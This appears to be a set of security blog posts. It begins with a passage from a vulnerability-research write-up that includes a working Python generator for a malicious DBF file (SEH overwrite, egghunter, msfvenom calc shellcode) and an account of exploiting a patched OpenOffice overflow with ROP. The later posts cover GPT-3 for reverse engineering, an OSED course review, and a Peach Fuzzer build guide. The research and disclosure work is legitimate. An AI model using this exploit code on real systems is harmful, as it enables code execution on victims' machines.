payload = b'\x03'                       # dbase version number
payload += b'\x01\x01\x01'              # last update date
payload += pack('<i', 1)                # number of records
payload += pack('<h', 65)               # number of records
payload += pack('<h', 4095)             # length of each record
payload += 20 * b'\x00'                 # reserved bytes

# field definition
payload += pack('11s', b'EXPLOIT')      # field name
payload += b'2'                         # field type (short integer)
payload += 4 * b'\x00'                  # field data address (can be null)
payload += pack('B', 255)               # field size (change accordingly)
payload += 15 * b'\x00'                 # reserved bytes
payload += b'\x0D'                      # terminator character

# record definition
payload += b'\x20'                      # deleted flag
payload += 28 * b'\x90'                 # offset
# payload += 4 * b'\x41'                # offset
payload += pack("<L", (0x909006eb))     # JMP 06
payload += pack("<L", (0x00457886))     # dbfview: pop edi; pop esi; ret
payload +=  egghunter                      
payload += b'w00tw00t'                  # egg

# msfvenom -p windows/exec CMD=calc -f python -v payload
payload += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
payload += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
payload += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
payload += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
payload += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
payload += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
payload += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
payload += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
payload += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
payload += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
payload += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
payload += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"
payload += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
payload += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
payload += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x00"

with open('payload.dbf', 'wb') as w:
    w.write(payload)

I opened the generated file in dbfview.exe, and popped Calc. Great!

POC Video

Source Code Review of Apache OpenOffice

Now that I had validated my dumb fuzzing template on a few smaller DBF processors, it was time to aim higher. The dumb fuzzing stage taught me that the DBF file format suffers from an inherent weakness: the buffer size of a record can be determined either by the fieldLength or the fieldType in the header. If a programmer blindly trusts one of them when allocating a buffer, but uses the other to determine the size of a copy into that buffer, this can lead to a buffer overflow.

As some open-source projects like Apache OpenOffice support DBF files, I decided to perform a source code review for this vulnerability. Not long after, I hit the jackpot on OpenOffice's DBF parsing code:

        else if ( DataType::INTEGER == nType )
        {
            sal_Int32 nValue = 0;
			memcpy(&nValue, pData, nLen);
            *(_rRow->get())[i] = nValue;
        }

Here, we can see a buffer nValue of size sal_Int32 (4 bytes) being instantiated for a field of type INTEGER. Next, memcpy copies a buffer of size nLen – which is an attacker-controlled value – into nValue without validating that nLen is smaller than or equal to 4. This pattern was repeated across various data types. Could this be a variation of the previous buffer overflow? I quickly modified my previous payload generator to the integer field type (I), increased the size of fieldLength to greater than sal_Int32, and opened the file in OpenOffice Calc. I got my crash!

Unfortunately, things weren't so easy this time round. Although the initial crash resulted in an SEH overwrite, the SEH chain refused to execute. The soffice binary itself had Safe Exception Handlers (SAFESEH) protections on, along with address space layout randomization (ASLR) and Data Execution Prevention (DEP), which prevented simple exploitation of the overflow.

Tracing back from the initial exception, I realised that it was triggered by some kind of validation check earlier in the execution flow:

0:000> p
eax=08ceacec ebx=0ffe68e8 ecx=08ceacf0 edx=00000001 esi=0ff38d60 edi=084299b9
eip=08c56920 esp=0178dd58 ebp=0178de74 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
dbase+0x16920:
08c56920 e862c6feff      call    dbase+0x2f87 (08c42f87)
0:000> u dbase+0x2f87 L12
dbase+0x2f87:
08c42f87 55              push    ebp
08c42f88 8bec            mov     ebp,esp
08c42f8a 56              push    esi
08c42f8b 8bf1            mov     esi,ecx
08c42f8d 8b4610          mov     eax,dword ptr [esi+10h]
08c42f90 2b460c          sub     eax,dword ptr [esi+0Ch]
08c42f93 57              push    edi
08c42f94 8b7d08          mov     edi,dword ptr [ebp+8]
08c42f97 c1f802          sar     eax,2
08c42f9a 3bf8            cmp     edi,eax
08c42f9c 7206            jb      dbase+0x2fa4 (08c42fa4)
08c42f9e ff1588b0c608    call    dword ptr [dbase!GetVersionInfo+0x9176 (08c6b088)]
08c42fa4 8b460c          mov     eax,dword ptr [esi+0Ch]
08c42fa7 8d04b8          lea     eax,[eax+edi*4]
08c42faa 5f              pop     edi
08c42fab 5e              pop     esi
08c42fac 5d              pop     ebp
08c42fad c20400          ret     4

Since the exception was triggered if the cmp edi,eax check failed, I performed dynamic analysis to determine the offset in my payload that was being evaluated, and set it to 00000001 to pass the check. This time, a different exception occurred – an invalid instruction exception.

This was a good sign that I had overwritten a return pointer on the stack and could thus control the execution flow again, which I confirmed in WinDBG. However, I still needed to get a DEP and ASLR bypass to start my return-oriented programming chain. Once again, I checked the protections of the loaded modules with narly:

0:011> !nmod
00110000 00b9c000 soffice              /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\soffice.bin
03e20000 04b67000 icudt40              NO_SEH                      C:\Program Files\OpenOffice 4\program\icudt40.dll
4de60000 4df58000 libxml2              /SafeSEH ON  /GS            C:\Program Files\OpenOffice 4\program\libxml2.dll
50040000 50097000 scui                 /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\scui.DLL
500a0000 502d3000 sb                   /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\sb.dll
50360000 50395000 forui                /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\forui.dll
503a0000 503e1000 uui                  /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\uui.dll
50470000 504bf000 ucpfile1             /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\ucpfile1.dll
504c0000 5053a000 configmgr_uno        /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\configmgr.uno.dll

Bingo. Among the various modules, libxml2 was still compiled without any DEP or ASLR protections, allowing me to use it as a source of ROP gadgets. I dumped all possible ROP gadgets with 0vercl0k's rp tool and got to work. I quickly encountered a problem: no matter how I set fieldLength value, it appeared that the overwritten buffer was limited to about 256 bytes. This precluded a traditional GetModuleHandleA > GetProcAddress > VirtualProtect chain, forcing me to try harder to meet this size limit. I began by trying a few optimizations. I moved my final VirtualProtect skeleton before the ROP chain in the buffer, giving me a little more room for my ROP gadgets. For my stack pivot, I used a hard-coded add esp, 0x0C ; ret ; gadget so that I did not have to dynamically create the offset in my chain. Lastly, for the purposes of the proof-of-concept, I decided to simply load WinExec to pop calc. This reduced the number of function calls I needed.

With a bit of elbow grease, I was finally able to get my proof-of-concept to work:

INSERT VIDEO HERE

With the insights I gathered from simple dumb fuzzing, I managed to get a code execution vulnerability in a software that was downloaded more than 300 million times! This begged the question: why did no one discover this bug earlier? As an open-source program, OpenOffice would undoubtedly have been automatically scanned by various static code analysers, which would have easily picked up the unsafe memcpy.

When I checked OpenOffice's page on https://lgtm.com/, a code analysis platform that runs CodeQL tests on open-source projects, I noticed something interesting:

LGTM OpenOffice

OpenOffice was tagged as a Python and JavaScript project. Since CodeQL requires the scanner to build a database of the relevant source code, CodeQL would have completely missed these vulnerabilities if OpenOffice's C++ code had been excluded while building the database. Browsing the files on LGTM, I noticed that there were no C++ files included. This demonstrates the importance of sanity-checking automated static analysis tools; if your tools don't know the code exists, it can't find those vulnerabilities.

Disclosing the Vulnerabilities

As it was my first foray into vulnerability research, I encountered a bit of a culture shock when it came to disclosure. Unlike web-based bug bounties where patches are relatively easier to deploy and resolve in a matter of days or weeks, development cycles for native applications, especially widely used ones, can be on the order of months. While Scalabium dBase viewer was run by a single developer and could be resolved almost immediately, Apache OpenOffice took much longer.

Scalabium dBase Viewer (CVE-2021-35297)

  • Jun 7: Initial disclosure
  • Jun 9: Acknowledgement and patch
  • Aug 17: CVE assigned

Apache OpenOffice (CVE-2021-33035)

  • 4 May: Initial disclosure
  • 5 May: Acknowledgement
  • 6 May: Request for disclosure/patch timeline
  • 12 May: 2nd request for disclosure/patch timeline
  • 19 May: 3rd request for disclosure/patch timeline
  • 21 May: Apache request for 30 Aug disclosure date and patch verification; CVE assigned
  • 21 May: Verified patch and agreed to 30 Aug disclosure date
  • 22 Jul: Request to re-confirm 30 Aug disclosure date
  • 26 Jul: Apache re-confirmed 30 Aug disclosure date
  • 28 Aug: Notify about 18 Sep full disclosure
  • 18 Sep: Full disclosure

Apache released new packages that patched this vulnerability and updated the source code on GitHub to perform buffer size checking. For example, the integer type now ensures that nLen equals 4:

        else if ( DataType::INTEGER == nType )
        {
            OSL_ENSURE(nLen == 4, "Invalid length for integer field");
            if (nLen != 4) {
                return false;
            }
            sal_Int32 nValue = 0;
			memcpy(&nValue, pData, nLen);
            *(_rRow->get())[i] = nValue;
        }

Overall, my experience with responsibly disclosing vulnerability research has been extremely varied, depending on the maturity and ability of individual vendors. It was definitely a far cry from the service-level agreement (SLA) timelines I enjoyed on third-party platforms. In some cases, vendors did not have a dedicated security disclosure contact, or listed an inactive email.

Conclusion and Next Steps

As I mentioned in the beginning, this blogpost is part one of a two-part series. Dumb fuzzing and source code reviews can only get you so far, especially when dealing with complex black box applications. In a week or two, I will follow up with part two, where I will disclose additional vulnerabilities I discovered via coverage-guided fuzzing in Microsoft Office and others.

In the meantime, I hope this provides guidance to application security pentesters dipping their toes into vulnerability research. I benefited greatly from expanding my offensive security arsenal and found interesting overlaps in the skills and intuition required for successful vulnerability research.

Down the Rabbit Hole: Unusual Applications of OpenAI in Cybersecurity Tooling

17 September 2021 at 13:16

Note: This is the blogpost version of a talk I gave to the National University of Singapore Greyhats club. If you prefer video, you can watch it here:

Introduction

Now that Mr. Robot and The Matrix are back on Netflix, re-watching them has been a strangely anachronistic experience. On the one hand, so much of what felt fresh and original back then now seems outdated, even cringey. After all, the past few years definitely provided no end of “F SOCIETY” moments, not to mention the hijacking of “red pill”... but the shows stand on their own with some of the most arresting opening scenes I've ever watched.

Matrix Cutscene

Mr Robot Cutscene

With AI well into the technology adoption lifecycle, most of the low-hanging fruits have been plucked – in cybersecurity, antivirus engines have integrated machine learning models on the client and in the cloud, while malicious actors abuse synthetic media generation to execute all kinds of scams and schemes. There's a ton of hype and scaremongering for sure, but still good reason to be concerned.

Matrix AI

OpenAI's next-generation GPT-3 language models gained widespread attention last year with the release of the OpenAI API, and was understandably a hot topic at Black Hat and DEF CON this year. A team from Georgetown University's Center for Security and Emerging Technology presented on applying GPT-3 to disinformation campaigns, while my team developed OpenAI-based phishing (and anti-phishing) tools that we shared at Black Hat and DEF CON. After all, the GPT-3 API presented a massive leap in power and access compared to the previous state-of-the-art; estimates by Lambda Labs show more than a hundredfold increase in parameters compared to GPT-2.

resource gpt-2 gpt-3 gpt-3 api
time 1+ weeks 355 years <1 minute
cost $43k $4.6m $0.06/1k tokens
data size 40 gb 45 tb negligible
compute 32 tpuv3s 1 tesla v100 gpu negligible
energy ? ? negligible
released 2019 2020 2020

However, most research into the malicious applications of AI tends to focus on human factors (scamming, phishing, disinformation). There has been some discussion of AI-powered malware but this remains very much in the proof-of-concept stage. This is partly a function of the kinds of models available to researchers – generative models lend themselves easily to synthetic media, while language models are easily applied to phishing and fake news. Classification problems fit antivirus solutions well. But where do we go from these low-hanging fruits?

OpenAI for Cybersecurity Tooling

Recently, OpenAI released new products that cross into code. First, GitHub developed Copilot based on GPT-3 that provided code auto-completion for programmers. Next, thanks to the data-sharing agreement with GitHub, OpenAI produced Codex, an arguably far more impressive tool that generates code based on plain language instructions.

OpenAI Codex

The shift into coding was partly inspired by early usage of the API beta that revealed that GPT-3 was actually pretty good at parsing code even without fine-tuning. For example, feeding it a prompt like this:

An engineer asked me about what this JavaScript code does:

"""
var minions = ["Bob", "Kevin", "Stuart"];
console.log(minions);
"""

I analyzed it for them, explaining what the assembly does in plain language a software engineer can understand:

Would return:

The code initializes an array with three names, then logs the array to the console. As a human, you can see that this code simply creates an array and logs it to the console.

Of course, given that the model is probabilistic, it also occasionally returned hilarious failures such as:

It creates an array of three integers, and then prints the array to the console.  I asked the engineer to explain the code to me in plain language. He struggled.  Why did it take so much work for him to explain this simple code?  I've noticed something interesting:  Years of experience with programming languages can actually make it harder to explain code.  Why does it take so much work to explain code after you've been programming for many years?  It feels like an effort to explain code using programming language features after you've learned so many of them.

OpenAI also recently released a davinci-instruct beta model that is fine-tuned to parse plain-language instructions and performed better in my own tests. Given that Codex appears to be a mix of davinci-instruct and fine-tuning on code, it would perform even better.

Reverse-Engineering Assembly

With all this in mind, I decided to put OpenAI's models through its paces. One possibility that stood out to me was applying GPT-3 to reverse-engineering assembly code. If it could explain Python or JavaScript code well, how about one layer down? After all, the best malware reverse engineers emphasize that pattern recognition is key. For example, consider the following IDA graph:

IDA graph

To the casual observer like me, it would take some time to read and understand the assembly code before concluding that it was an RC4 cipher key scheduling algorithm. In particular, this is the RC4 cipher from a Metasploit payload used in Flare-On 2020 Challenge 7 – read about my process here. Experienced reverse engineers would be able to quickly zoom into interesting constants (100h – 256 in decimal) and the overall “shape” of the graph to immediately reach the same conclusion.

Would it be possible to tap on a key strength of machine learning – pattern recognition – to automate this process? While classification models are used extensively by antivirus engines nowadays, would it be possible to jerry-rig the GPT-3 language model for assembly?

Right of the bat, GPT-3 by itself is terrible at interpreting assembly. Take the same RC4 example and ask GPT-3 to explain what it is:

GPT-3 vs Asssembly Example 1

GPT-3's first answer is that the assembly code prints “HELLO WORLD”. While this demonstrates that GPT-3 understood the prompt, the answer was way off base.

How about changing the prompt instead? This time, I asked GPT-3 to translate the assembly code to Python:

GPT-3 vs Asssembly Example 2

Still not great. It seemed like the model was not sufficiently optimized for assembly code. Fortunately, OpenAI also just released a beta fine-tuning feature that allows users to fine-tune GPT-3 (up to the Curie model) on training completions. The training file is in JSONL format and looks like this:

{"prompt": "<prompt text>", "completion": "<ideal generated text>"}
{"prompt": "<prompt text>", "completion": "<ideal generated text>"}
{"prompt": "<prompt text>", "completion": "<ideal generated text>"}

More importantly, it's free to fine-tune models up to 10 fine-tuning runs per month; data sets are limited to 2.5 million tokens (about 80-100mb). Interestingly, even though GPT-3 really started out as a completion API, OpenAI suggests that fine-tuning could be used to transform the model into classifiers, giving the example of email filters. By setting the auto-completion tokens to 1 (i.e., only return 1 word in the completion), the “completion” now functions as a classification (e.g. returning “spam” or “junk”).

Thus began my very unscientific experiment. I generated a training corpus of 100 windows/shell/reverse_tcp_rc4 payloads with Metasploit, diassembled them with objdump, and cleaned the output with sed. For my unencrypted corpus, I used windows/shell/reverse_tcp. Since Metasploit slightly varies each payload per iteration (I also randomized the RC4 key), there was at least some difference among each sample.

Training Set

I then placed the assembly as the prompt in each training sample and set the completion value to either rc4 or unecrypted. Next step: training – openai api fine_tunes.create –t training_samples.jsonl -m curie --no_packing.

Fine Tuning

Here, I discovered one major advantage of the API – whereas fine-tuning GPT-2 takes significant time and computing power for hobbyists, fine-tuning GPT-3 via the API took about five minutes on OpenAI's powerful servers. And it's free, too! For now.

With my fine-tuned model in hand, I validated it against a tiny test set scraped from the web. I took custom RC4 assembly by different authors for my test set, such as rc4-cipher-in-assembly. For the unencrypted test set, I simply used non-encryption related assembly code.

The unscientific results (put away your pitchforks) were encouraging:

Experiment Results

RC4 was recognized 4 out of 5 times, while unecrypted 3 out of 5. Interestingly, the “wrong” reuslts for unencrypted test samples weren't due to miscategorizing them as rc4. Instead, the fine-tuned model simply returned unrelated tokens such as new tab characters. This was likely because my training set for unencrypted assembly was purely Metasploit shells, while the test set was more varied, including custom code to pop calculator and so on. If one were to take these results as false negatives instead of false positives, the picture looks even better. Of course, the results varied with each iteration, but they remained consistently correct.

Code Review

Since I didn't have access to the Codex beta yet, I used davinci-instruct as the next-best-option to perform code review. I fed it simple samples of vulnerable code and it performed reasonably well.

PHP Code Review

In this sample, it correctly identified the XSS vulnerability, even specifying the exact parameter that caused the vulnerability.

It's also important to note that Codex explicitly cites error-checking of code as a use case. With a bit of tweaking, it's not too much of a stretch to say that it could also perform vulnerability-checking. The only limitation here would be performance over large prompts or codebases. However, for small cases (whitebox CTFs or DOM XSS?), we might see decent results soon.

Furthermore, even though fine-tuning is limited up to the Curie model for now, if OpenAI opens up Codex or Davinci for fine-tuning, the performance gains would be incredible.

Blind Alleys

With a few simple experiments, I found that OpenAI's GPT-3 could be further fine-tuned for specific use cases by cybersecurity researchers. However, there are clear limits to GPT-3's effectiveness. As a language model at heart, it's better suited at tasks like completion and instructions, but I doubt it might be as good at cryptanalysis or fuzzing – there's no free lunch. There are better classes of ML models for different tasks – or maybe ML isn't even useful in some cases.

The flip side of using AI as a cybersecurity research tool is that those tools can also be compromised – the machine learning variant of a supply-chain attack. Data sources like GitHub can be poisoned to produce vulnerable code, or even leak secrets. I think the use of GitHub code as a training dataset, even for open-source licenses, will remain a sticking point for some.

However, it's clear to me that even if the low-hanging fruit have been plucked, there are still unusual and potentially powerful use-cases for machine learning models in cybersecurity. As access to GPT-3 grows over time, I expect interesting AI-powered security tooling to emerge. For example, IDA recently released a cloud-based Decompiler; while machine learning hasn't come into the equation, it could be an interesting experiment. How about a security hackathon, OpenAI? Let's see how far this rabbit hole goes.

ROP and Roll: EXP-301 Offensive Security Exploit Developer (OSED) Review and Exam

23 June 2021 at 15:21

The Rule of Three

EXP-301 Logo by Offensive Security

The Windows User Mode Exploit Development (EXP-301) course and the accompanying Offensive Security Exploit Developer (OSED) certification is the last of the three courses to be released as part of the Offensive Security Certified Expert – Three (OSCE3) certification. Since the appointment of the new CEO Nina Wang in 2019, Offensive Security has revamped its venerable lineup of courses and certifications, culminating in the new OSCE3 announced at the end of 2020. As I’ve discussed in my Offensive Security Experienced Penetration Tester (OSEP) review, this makes a lot of sense from a marketing and sales strategy standpoint. Although Offensive Security was best known for its no-expiry certifications, it has since retired a number of them, including the old OSCE and more recently Offensive Security Wireless Attacks (OSWP). It has also introduced a number of recurring revenue subscription products such as the Offensive Security Proving Grounds, PWK365, and more. Oh, and it’s raising the price of exam retakes from $150 to $249. These are all great business decisions for Offensive Security, but for the regular cybersecurity professional, is the EXP-301/OSED worth it?

When it comes to learning exploit development, the foundations haven’t really changed since Corelan’s classic exploit writing tutorial series in 2009. You start with the basic overflows and structured exception handlers, then move on to increasingly challenging bypasses such as data execution prevention and address space layout randomisation. You learn to do return oriented programming, custom shell coding, and more intermediate topics – all in x86. That’s because even though the modern exploit development environment is incredibly different from 2009, the fundamentals have largely remained the same. However, it’s still a steep learning curve for most because you have to reconfigure your thought process around stacks and assembly code – not exactly the most intuitive concepts.

That’s why a foundational exploit development course in x86 is still relevant today and I felt that EXP-301 does this very well. You could definitely just do Corelan’s free exploit writing tutorial series, but you won’t be working on modern tools such as WinDBG and IDA. Additionally, EXP-301 provides a huge amount of material to guide you every step of the way until it finally clicks in your head. I can’t emphasize this enough – whether you are working in x86 or x64, in x64dbg or WinDBG, unless you have achieved a high level of familiarity with manipulating the stack in assembly-land, you will face endless difficulties. The labs are excellent at honing particular aspects of exploit development before the exam brings them all together in classic “Try Harder” fashion. EXP-301 shines when it taps on Offensive Security’s exploit heritage.

After clearing the OSEP at the end of February 2021, I took the 60-day EXP-301/OSED package from March to May 2021, and finally cleared the exam in mid-June. At the time of writing, this costs $1299. As my job role is pretty multi-disciplinary, I found it necessary to build up my exploit development skills and the OSED came at a right time. I also can’t deny that the lure of the OSCE3 “halo” certification pushed me to take it – the marketing is working! While I have previously done the Corelan series and the occasional exploit development tutorial, I didn’t quite grok it. In addition, while I was more comfortable in application security and penetration testing, I felt that I lacked that extra punch in my offensive skills without binary exploitation. Here's my review along with some tips and tricks to maximise your OSED experience.

What You Should Know

Offensive Security recommends the following pre-requisites to take the Windows User Mode Exploit Development course:

  • Familiarity with debuggers (ImmunityDBG, OllyDBG)
  • Familiarity with basic exploitation concepts on 32-bit
  • Familiarity with writing Python 3 code

The following optional skills are recommended:

  • Ability to read and understand C code at a basic level
  • Ability to read and understand 32-bit Assembly code at a basic level

However, while I think these pre-requisites are sufficient for the first half the course, once you move into return-oriented programming and reverse engineering, understanding 32-bit assembly code is no longer optional. You should really build up your familiarity with assembly and reverse engineering as much as possible before taking the course. In addition, you would save a lot of time in the earlier sections by completing some of the Corelan exploit writing tutorials first – EXP-301 tracks it pretty closely.

As with all Offensive Security courses, EXP-301 teaches you everything you need to know on top of the recommended pre-requisites, but unless you have the time to thoroughly study the materials on a consistent basis, you may find it difficult to fully grasp the concepts without additional preparation.

What You Will Learn

Unlike PEN-300/OSEP, which taught a broad array of topics in penetration testing, EXP-301 sticks close to the fundamentals and goes deep. As mentioned earlier, you start with the basics of buffer overflows and SEH overwrites, but the course quickly moves on to reverse engineering with IDA, custom shell coding your egg hunters and reverse shells, ROP chaining, and finally format string attacks.

I found that EXP-301 is especially strong in three areas: reverse engineering, custom shell code, and ROP. While some might question the usefulness of teaching IDA Free when Ghidra is a thing, I’d say that the two are pretty interchangeable at this level. Furthermore, IDA Pro remains the standard for advanced users, so it’s better to get acquainted with IDA first. Interestingly, by forcing you to rely on IDA Free’s limited set of features, the course makes you better at reverse engineering in the long run. While I considered myself fairly proficient at the basics of reverse engineering, having completed two-thirds of last year’s Flare-On challenges, I still relied on bad analysis patterns and leaned hard on the pseudocode crutch. With only assembly decompilation and limited signatures in IDA Free, I could no longer do that.

ROP chaining and custom shell coding can be incredibly hard to master because it’s difficult for most people to intuitively understand these concepts. Before the course, while I knew the basic principles of ROP, I could hardly get started. EXP-301 properly explains every step of the process, working through each assembly instruction over multiple exercises until it flows naturally for you. By the middle of the course, I was comfortable enough to apply ROP to my own vulnerability research and successfully built exploits for real-world bugs that are now pending full disclosure.

However, the two format string attacks chapters were a little weak. Placed at the end of the course, they cover format string reads and writes respectively. While the concepts are taught well, I could definitely have used a bit more practice in exploiting them. Perhaps the course could have taught more attack vectors and format string variants.

Overall, each chapter builds well on the previous one, creating a solid foundation for exploit development.

What You Should Also Learn By Yourself

As an exploit development rather than a vulnerability research course, EXP-301 only covers the reverse engineering route to finding bugs. You won’t learn fuzzing or source code review which can be entire courses in themselves. You may want to learn these in order to properly conduct vulnerability research on your own. You can check out my Peach Fuzzer tutorial for a beginner’s quickstart to fuzzing – there are plenty of write-ups and tutorials out there. One big difference between EXP-301 and the Corelan tutorials is that the former only deals with network-based exploits, while some of the exploits covered by Corelan are file-based. This is another huge domain to cover.

Other than that, the obvious next steps would be the concepts covered by the Advanced Windows Exploitation course: kernel exploits, type confusion, heap spraying and more – approaching real mastery. You wouldn’t really expect these in a foundational exploit development course, but they are necessary to go far.

How I Prepared for the Exam

To prepare for the exam, I tried to complete all the exercises and extra miles, missing out only two super-hard ones (you will know what they are; the course tells you as much). I also completed all of the lab machines.

Additionally, I worked on building my automation. Epi has a fantastic OSED-scripts repo that automates various tasks in exploit development, such as categorising ROP gadgets and generating building blocks for custom shell code. However, if you use them without understanding them, it’s a recipe for disaster – focus on understanding how and why these scripts work by reading the code and stepping through various exercises with them. I contributed my own additions and edits to the repo as I practised, which helped me better understand the underlying concepts. You could do what I did and modify the repo or write your own automation, but the end goal should be solidifying your fundamentals, not taking short cuts.

Other than that, I also applied some of the course knowledge in my own vulnerability research. As mentioned earlier, these vulnerabilities are pending full disclosure but I’m pretty excited about them because they demonstrated an immediate application of the skills I learned in the course.

I also highly recommend joining the official Offensive Security Discord server. You get to chat with other students and Offensive Security staff as you work through the course, which really helps to clear up misunderstandings or clarify concepts. Big shoutout to @TheCyberBebop @epi @bonjoo @hdtran and more!

I was very apprehensive about the exam, and I was right to be. While the OSWE and OSEP exams were generally in line with what I expected based on the courses and labs, the OSED exam was a whole other beast. It was kind of like looking at everything I had been taught in the course through a funhouse mirror – same same but different. Try Harder different. At every turn, I felt like obstacles had been specifically placed in my way to make things more difficult. I advise you to read the instructions properly and manage your time well. By the end of the exam, I had completed all of the three challenges, although one of them only worked on the development machine. I realised why only when writing my report – a real facepalm moment! Let’s just say I didn’t sleep much during that 48-hour exam.

I submitted my report on Wednesday and received the exciting news that I had passed the following Tuesday afternoon. I also received a second congratulatory message that I had achieved the OSCE3.

OSCE3 Certification

Triple Threat

To answer the question, “Is EXP-301 worth it?” you can think about it in two ways. As a foundational exploit development course, I think it’s fantastic. It really gets you to a level of familiarity with the fundamentals such as reading assembly code and manipulating the stack that is hard to achieve with free write-ups. As part of the OSCE3, I think it is a nice testament to your all-round skill and ability to withstand suffering, but not strictly necessary. While offensive security roles tend to be fairly inter-disciplinary, it is also perfectly possible to stay within the application security or penetration testing domains without ever needing to read a line of assembly code. Only take this on if you’re sure you need the exploit development skills or if you have the resources to splash out on completing the trilogy for the sake of it.

As to what’s next, Offensive Security continues to refresh its product line under the new direction of the CEO. It recently announced that the Wireless Attacks course would be retired, possibly paving the way for a modern Internet-Of-Things course. At its current price-to-value ratio, Offensive Security sits in between the mass-market Udemy-style courses and the sky-high SANS and bespoke trainings. Personally, I’m interested to see how it’ll shake up this market in the long run.

#offensivesecurity #certification #infosec #cybersecurity

Life’s a Peach (Fuzzer): How to Build and Use GitLab’s Open-Source Protocol Fuzzer

22 May 2021 at 03:08

Motivation

The Peach protocol fuzzer was a well-known protocol fuzzer whose parent company — Peach Tech — was acquired in 2020 by GitLab. While Peach Tech had previously released a Community Edition of Peach fuzzer, it lacked many key features and updates found in the commercial editions. Fortunately, GitLab has open-sourced the core protocol fuzzing engine of Peach under the name “GitLab Protocol Fuzzer Community Edition,” allowing anyone to build and deploy it. For simplicity, I will refer to the new open-sourced version as Peach Fuzzer.

Peachy

As expected of an early-stage project, the build process is complicated and not well-documented. In addition, first-time users may have trouble understanding how to use the fuzzer. Moreover, GitLab's open-sourced version still lacks important resources such as fuzzing templates, which means you will have to write them on your own.

To that end, this article aims to demonstrate an end-to-end application of Peach Fuzzer, from build to deployment. Look out for a subsequent article where I will touch on the full workflow of finding and exploiting vulnerabilities using Peach Fuzzer.

Building Peach Fuzzer

Although Peach Fuzzer can be built on both Linux and Windows, it appeared that the Linux build flow was broken at the time of writing. As such, I built the application in Windows , for Windows.

I used the latest version of Windows 10 Professional even though Microsoft does provide handy virtual machines for free. Due to the onerous dependency requirements, I highly recommend building Peach Fuzzer in a fresh virtual machine to avoid messing up your own regular setup.

Dependencies

The existing documentation on the GitLab repository lists the following build prerequisites:

  • Python 2.7

  • Ruby 2.3

  • doxygen, java, xmllint, xsltprocx

  • .NET Framework 4.6.1

  • Visual Studio 2015 or 2017 with C++ compilers

  • TypeScript Compiler (tsc) v2.8

  • Intel Pin

Let us go through them one by one.

Python 2.7

Yep, it is already deprecated, but the build flow is explicitly written for 2.7 and is not compatible with Python 3 (I tried). Get the x86-64 MSI installer at https://www.python.org/downloads/release/python-2718/ and install it — remember to select the installation option to add it to your PATH! Alternatively, if you already have Python 3 installed, you can continue to install 2.7, and then run Python with py -2.7 <PYTHON COMMANDS>.

Ruby 2.3

While the documentation recommends an outdated version of Ruby, I was fine installing Ruby 2.7.2-1 (x64) from the RubyInstaller download page (without DevKit). Remember to select the option to add this to your PATH. Although you do not need the MSYS2 toolchain, it would not hurt to have it installed.

java, xmllint, xsltprocx

This is a long list and it would be probably tedious to install these dependencies separately. Thankfully, these packages are mostly available via the Chocolatey Windows package manager. Start by installing Chocolatey with the instructions found at https://chocolatey.org/install, then run the following commands in an elevated PowerShell window:

choco install jdk8 choco install xsltproc choco install git

You need to install git as well to clone the Peach Fuzzer repository later.

doxygen

doxygen is a special case — you will need to install it from the installer at https://www.doxygen.nl/download.html. After that, edit the PATH environment variable to include C:\Program Files\doxygen\bin.

.NET Framework 4.6.1, Visual Studio 2015 or 2017 with C++ compilers

Here is where things get a bit complicated. Even though the documentation states .NET Framework 4.6.1, it appears that 4.5.1 is necessary as well to prevent the build process from crashing. Since the latest version of Visual Studio is 2019, you cannot download Visual Studio 2017 directly. Go to this download page to get the older versions and create a free Visual Studio Dev Essentials account to access it. Download Visual Studio Community 2017 (version 15.9) and start the installation.

You will be prompted to install the different developer components. I selected the Desktop development with C++ workload. In addition, I chose the .NET Framework 4.6.1 and 4.5.1 SDKs with targeting packs under “Individual components”. You can see a list of my installation components in the right sidebar for your reference.

Visual Studio

Visual Studio Component Installation Screen

TypeScript Compiler

Although tsc appears to be installed by default in Node (by running npx tsc), you will also have to install this globally. Install the LTS version of Node at https://nodejs.org/en/, then run npm install typescript --global in an elevated command prompt and you are all set!

Intel Pin

This is another tricky one. The documentation recommends v3.2 81205 but it is so outdated that the Intel page no longer lists it. You can download them directly from one of these links:

  1. Windows: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.4-97438-msvc-windows.zip

  2. Linux: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.2-81205-gcc-linux.tar.gz

  3. MacOS: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.2-81205-clang-mac.tar.gz

Since you are building for Windows, you only need the Windows version. Open the zip file and copy the pin-3.2-81205-msvc-windows folder to protocol-fuzzer-ce\3rdParty\pin.

Hidden Dependencies

